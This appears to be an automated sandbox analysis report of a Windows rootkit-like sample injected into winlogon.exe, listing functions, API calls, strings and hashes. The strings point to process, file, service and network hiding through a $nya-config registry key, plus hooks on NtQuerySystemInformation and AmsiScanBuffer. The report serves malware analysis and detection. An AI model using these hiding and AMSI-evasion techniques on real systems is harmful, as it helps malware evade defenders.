RegOpenKeyExW.ADVAPI32 ref: 00000001400016F9
RegCloseKey.ADVAPI32 ref: 0000000140001714
RegOpenKeyExW.ADVAPI32 ref: 0000000140001734
RegCloseKey.ADVAPI32 ref: 000000014000174F
RegOpenKeyExW.ADVAPI32 ref: 000000014000176F
RegCloseKey.ADVAPI32 ref: 000000014000178A
RegCloseKey.ADVAPI32 ref: 0000000140001794

Part of subcall function 0000000140001274: RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400012DF
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400012F0
Part of subcall function 0000000140001274: RegEnumValueW.ADVAPI32 ref: 000000014000134F
Part of subcall function 0000000140001274: StrCmpIW.SHLWAPI ref: 0000000140001388
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013C7
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400013D5
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013F2
Part of subcall function 0000000140001274: HeapFree.KERNEL32 ref: 0000000140001400

Strings

SOFTWARE\$nya-config, xrefs: 0000000140001586
tcp_remote, xrefs: 000000014000172D
service_names, xrefs: 00000001400016B7
tcp_local, xrefs: 00000001400016F2
paths, xrefs: 000000014000167C
pid, xrefs: 0000000140001606
udp, xrefs: 0000000140001768
startup, xrefs: 00000001400015C9
process_names, xrefs: 0000000140001641

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 3993315683-3572789727
Opcode ID: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
Instruction ID: 5ebcb72c0a3035c4b67d8f00751cefd31434bbf5df89411654f5c91112f76ea3
Opcode Fuzzy Hash: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000001400010B1
RegEnumValueW.ADVAPI32 ref: 0000000140001117
GetProcessHeap.KERNEL32 ref: 000000014000115A
HeapAlloc.KERNEL32 ref: 0000000140001168
GetProcessHeap.KERNEL32 ref: 0000000140001185
HeapFree.KERNEL32 ref: 0000000140001193

Strings

d, xrefs: 00000001400010D6

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
Instruction ID: 42b997484051ce9e6daf6bc3104cf1544be02307d9272190f1dec121864cc25c
Opcode Fuzzy Hash: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
Instruction Fuzzy Hash: E1412AB2214B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40

Function 00000001400017A8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00000001400017DC
RegDeleteKeyW.ADVAPI32 ref: 00000001400017ED
RegEnumKeyExW.ADVAPI32 ref: 000000014000182A
RegCloseKey.ADVAPI32 ref: 000000014000183B
RegDeleteKeyExW.ADVAPI32 ref: 0000000140001858

Strings

SOFTWARE\$nya-config, xrefs: 00000001400017CE, 0000000140001844

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\$nya-config
API String ID: 3013565938-2636501262
Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19

Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400014B2
HeapFree.KERNEL32 ref: 00000001400014C1
GetProcessHeap.KERNEL32 ref: 00000001400014CE
HeapFree.KERNEL32 ref: 00000001400014DD
GetProcessHeap.KERNEL32 ref: 00000001400014ED

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
Instruction ID: ae713076178dcd36b59d2bede7e3524c8608a398496d325058d9822cf47af1f0
Opcode Fuzzy Hash: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
Instruction Fuzzy Hash: D80102B2610A908AE705EF67B90438977A1F78CFC5F4A4025FB9953739DE38D491C744

Function 00000001400020CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020DC
GetProcAddress.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020EF

Strings

ntdll.dll, xrefs: 00000001400020D2

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318

Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750

Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24

Analysis Process: winlogon.exePID: 556, Parent PID: 6140COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.7%
Total number of Nodes:	111
Total number of Limit Nodes:	17

Executed Functions

Function 000001CA7D1E2C80 Relevance: 13.6, APIs: 9, Instructions: 131
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 000001CA7D1E2CAD
TlsGetValue.KERNEL32 ref: 000001CA7D1E2CBC
TlsGetValue.KERNEL32 ref: 000001CA7D1E2CCB
NtEnumerateValueKey.NTDLL ref: 000001CA7D1E2D40
NtEnumerateValueKey.NTDLL ref: 000001CA7D1E2D76
NtEnumerateValueKey.NTDLL ref: 000001CA7D1E2DB3
TlsSetValue.KERNEL32 ref: 000001CA7D1E2E0F
TlsSetValue.KERNEL32 ref: 000001CA7D1E2E1E
TlsSetValue.KERNEL32 ref: 000001CA7D1E2E2D

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Value$Enumerate
String ID:
API String ID: 3520290360-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: ddcfc76e88451ae92f4f9cda427641abdeb8210533d5a923a24e23578d1e4606
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: BF51C333B4570487F326CB15E460E9AB3A4FB84B89F904119AE4A43754EF3AC905CB83

Function 000001CA7D1E1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001CA7D1E1E47
GetProcAddress.KERNEL32 ref: 000001CA7D1E1E57
SleepEx.KERNELBASE ref: 000001CA7D1E1E67

Strings

AmsiScanBuffer, xrefs: 000001CA7D1E1E50
amsi.dll, xrefs: 000001CA7D1E1E40

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 3f2b23ccba4f01efca1837d1ec0e5ebe98186c814f68ab41dbead1d3c470ee30
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: FFD06272ED3708D5F90B6B51E8A4FD43262BF54B09FC50855C50E01264DE2EC659D3D3

Function 000001CA7D1E1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D1E172F
HeapAlloc.KERNEL32 ref: 000001CA7D1E173E

Part of subcall function 000001CA7D1E1264: GetProcessHeap.KERNEL32 ref: 000001CA7D1E126A
Part of subcall function 000001CA7D1E1264: HeapAlloc.KERNEL32 ref: 000001CA7D1E1279
Part of subcall function 000001CA7D1E1264: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1293
Part of subcall function 000001CA7D1E1264: HeapAlloc.KERNEL32 ref: 000001CA7D1E12A4

Part of subcall function 000001CA7D1E1000: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1006
Part of subcall function 000001CA7D1E1000: HeapAlloc.KERNEL32 ref: 000001CA7D1E1015
Part of subcall function 000001CA7D1E1000: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1028
Part of subcall function 000001CA7D1E1000: HeapAlloc.KERNEL32 ref: 000001CA7D1E1037

RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17AE
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17DB
RegCloseKey.ADVAPI32 ref: 000001CA7D1E17F5
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1815
RegCloseKey.KERNELBASE ref: 000001CA7D1E1830
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1850
RegCloseKey.ADVAPI32 ref: 000001CA7D1E186B
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E188B
RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A6
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E18C6
RegCloseKey.ADVAPI32 ref: 000001CA7D1E18E1
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1901
RegCloseKey.KERNELBASE ref: 000001CA7D1E191C
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E193C
RegCloseKey.ADVAPI32 ref: 000001CA7D1E1957
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1977
RegCloseKey.ADVAPI32 ref: 000001CA7D1E1992
RegCloseKey.KERNELBASE ref: 000001CA7D1E199C

Part of subcall function 000001CA7D1E12B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D1E1315
Part of subcall function 000001CA7D1E12B8: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1323
Part of subcall function 000001CA7D1E12B8: HeapAlloc.KERNEL32 ref: 000001CA7D1E1334
Part of subcall function 000001CA7D1E12B8: RegEnumValueW.ADVAPI32 ref: 000001CA7D1E1393
Part of subcall function 000001CA7D1E12B8: GetProcessHeap.KERNEL32 ref: 000001CA7D1E13DB
Part of subcall function 000001CA7D1E12B8: HeapAlloc.KERNEL32 ref: 000001CA7D1E13E9
Part of subcall function 000001CA7D1E12B8: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1406
Part of subcall function 000001CA7D1E12B8: HeapFree.KERNEL32 ref: 000001CA7D1E1414
Part of subcall function 000001CA7D1E12B8: lstrlenW.KERNEL32 ref: 000001CA7D1E141D
Part of subcall function 000001CA7D1E12B8: GetProcessHeap.KERNEL32 ref: 000001CA7D1E142B
Part of subcall function 000001CA7D1E12B8: HeapAlloc.KERNEL32 ref: 000001CA7D1E1439

Strings

tcp_local, xrefs: 000001CA7D1E18FA
paths, xrefs: 000001CA7D1E1884
udp, xrefs: 000001CA7D1E1970
SOFTWARE\$nya-config, xrefs: 000001CA7D1E178E
pid, xrefs: 000001CA7D1E180E
service_names, xrefs: 000001CA7D1E18BF
startup, xrefs: 000001CA7D1E17D1
process_names, xrefs: 000001CA7D1E1849
tcp_remote, xrefs: 000001CA7D1E1935

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 16a9fbc9ca01aa2ad8d01d5c7c5c6cd5cef1b3026fde7233e4cf92ec2729da17
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: A7711637A51B5986FB119F65E8A0AD833A5FF84B8DF811111DE4D43B28DE3AC584C392

Function 000001CA7D1E1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001CA7D1E1E7F

Part of subcall function 000001CA7D1E22A8: GetModuleHandleA.KERNEL32(?,?,?,000001CA7D1E1EB1), ref: 000001CA7D1E22C0
Part of subcall function 000001CA7D1E22A8: GetProcAddress.KERNEL32(?,?,?,000001CA7D1E1EB1), ref: 000001CA7D1E22D1

CreateThread.KERNELBASE ref: 000001CA7D1E2043
TlsAlloc.KERNEL32 ref: 000001CA7D1E2049
TlsAlloc.KERNEL32 ref: 000001CA7D1E2055
TlsAlloc.KERNEL32 ref: 000001CA7D1E2061
TlsAlloc.KERNEL32 ref: 000001CA7D1E206D
TlsAlloc.KERNEL32 ref: 000001CA7D1E2079
TlsAlloc.KERNEL32 ref: 000001CA7D1E2085

Strings

AmsiScanBuffer, xrefs: 000001CA7D1E2012
NtDeviceIoControlFile, xrefs: 000001CA7D1E1FB6
NtQueryDirectoryFileEx, xrefs: 000001CA7D1E1EFC
NtQuerySystemInformation, xrefs: 000001CA7D1E1EA5
advapi32.dll, xrefs: 000001CA7D1E1F57, 000001CA7D1E1F78
EnumServicesStatusExW, xrefs: 000001CA7D1E1F71, 000001CA7D1E1F92
sechost.dll, xrefs: 000001CA7D1E1F99
amsi.dll, xrefs: 000001CA7D1E2019
PdhGetFormattedCounterArrayW, xrefs: 000001CA7D1E1FF1
PdhGetRawCounterArrayW, xrefs: 000001CA7D1E1FD0
NtEnumerateKey, xrefs: 000001CA7D1E1F19
EnumServiceGroupW, xrefs: 000001CA7D1E1F50
NtEnumerateValueKey, xrefs: 000001CA7D1E1F36
ntdll.dll, xrefs: 000001CA7D1E1E8D
NtResumeThread, xrefs: 000001CA7D1E1EC2
NtQueryDirectoryFile, xrefs: 000001CA7D1E1EDF
pdh.dll, xrefs: 000001CA7D1E1FD7, 000001CA7D1E1FF8

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 28d763e4b3efa6897c284255733b152927e4241509441b1b3e99965525c9534b
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 115171B2E91B4EA5FB03DB64E860FD43322BF4074DFC00956A40942565EE7AC25AD3E3

Function 000001CA7D1EEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001CA7D1EF34A,?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EEFF5
GetLastError.KERNEL32(?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EF007
LoadLibraryExW.KERNEL32(?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EF049
VirtualProtect.KERNELBASE ref: 000001CA7D1EF0A5
VirtualProtect.KERNEL32 ref: 000001CA7D1EF0D6
FreeLibrary.KERNEL32(?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EF11A
GetProcAddress.KERNEL32(?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EF126

Strings

api-ms-, xrefs: 000001CA7D1EF01B
AppPolicyGetProcessTerminationMethod, xrefs: 000001CA7D1EF157, 000001CA7D1EF165
ext-ms-, xrefs: 000001CA7D1EF02E

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 75b8f92d8bfc56aebef74cbf69bbb5d49082de77f78bb49cf1e15368de41eb5e
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 91519C72B4170C51FA169B96A800BE57261BF48BB9FC847249E39473D4EF3AD505C783

Function 000001CA7D1E6270 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E62AB
GetThreadContext.KERNEL32 ref: 000001CA7D1E6415

Part of subcall function 000001CA7D1E60A0: GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E60A4

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
Instruction ID: d05defe120a4688720ce9ecdd58902b16fb62d512cdd13eabecee864d7326d01
Opcode Fuzzy Hash: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
Instruction Fuzzy Hash: 1DD1CC37644B8C82FA71DB0AE49079A77A0F788B89F900512EACD47765DF3DC541CB82

Function 000001CA7D1E5810 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E5896

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
